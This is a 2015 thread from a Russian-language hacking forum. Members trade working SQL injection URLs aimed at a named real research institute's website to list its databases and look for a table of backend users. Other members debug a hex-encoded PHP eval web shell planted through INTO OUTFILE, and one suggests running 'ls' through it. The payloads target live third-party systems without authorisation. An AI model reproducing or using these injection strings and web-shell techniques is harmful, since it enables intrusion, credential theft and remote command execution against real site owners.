HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.03.2015, 00:56
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:
лучше, только не та база(
лень перебрать пять строчек лимита?

Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
 
Ответить с цитированием

  #2  
Старый 14.03.2015, 09:29
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
лень перебрать пять строчек лимита?
Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
я все ввидел эти базы, не они, мне нужна таблица be_users

тут не в одной таблице нету(
 
Ответить с цитированием

  #3  
Старый 14.03.2015, 10:05
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:
я все ввидел эти базы, не они, мне нужна таблица be_users
тут не в одной таблице нету(
не понимаю. если вы не нашли вывод, откуда вы знаете, что эта таблица там есть?

вот ваша sqli:

Код:
Code:
http://www1.ids-mannheim.de/oea/forsch/forsch1.html?database=projekte
database: projekte

Код:
Code:
http://www.ids-mannheim.de/cosmas2//projekt/referenz/korpora1.html?sigle=T13&archiv=W%27+div+0+union+select+1,2,3,4,5,6,7,schema_name,9+from+information_schema.schemata+limit+3,1--+
вывод: Archiv: projekte

т. е. серв mysql, вероятно, один.
 
Ответить с цитированием

  #4  
Старый 14.03.2015, 13:10
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Пытаюсь загрузить шелл через SQL-инъекцию

Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -

выдаёт

Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1
 
Ответить с цитированием

  #5  
Старый 14.03.2015, 13:17
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1
зачем текст шелла в кавычках и сверху еще hex?

у вас там и так все нормально льется.

Код:
Code:
union+select+1,2,%27%27,4,5,6,7+from+mysql.user+into+outfile+%27/usr/local/www/data/555.php%27--+
 
Ответить с цитированием

  #6  
Старый 14.03.2015, 13:20
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Пытаюсь загрузить шелл через SQL-инъекцию
Код:
Code:
'-1'+union+select+1,2,0x273c3f706870206576616c28245f4745545b9165925d29203f3e27,4,5,6,7+from+mysql.user+into+outfile+'/usr/local/www/data/l00k.php'+--+
При обращении к localhost/l00k.php -
выдаёт
Parse error: syntax error, unexpected T_LNUMBER, expecting ']' in /usr/local/www/data/l00k.php on line 1
у Вас кавычки в гет параметра e неправильны еще в добавок! Вы с ворда наверно вставляли)
 
Ответить с цитированием

  #7  
Старый 14.03.2015, 13:24
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
у вас там и так все нормально льется.
Нет, 1 2

Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1

4 5 6 7
 
Ответить с цитированием

  #8  
Старый 14.03.2015, 13:27
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

ну так попробуйте выполнить ls, например
 
Ответить с цитированием

  #9  
Старый 14.03.2015, 13:50
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Нет, 1 2
Warning: system() [function.system]: Cannot execute a blank command in /usr/local/www/data/555.php on line 1
4 5 6 7
blank - пустой

Вы вызываете шелл-код с пустыми параметрами.

Как и сказал faza02 передайте какой-либо аргумент в функцию вызова.
 
Ответить с цитированием

  #10  
Старый 14.03.2015, 20:20
teh
Guest
Сообщений: n/a
Провел на форуме:
26437

Репутация: -2
По умолчанию

Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке

site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ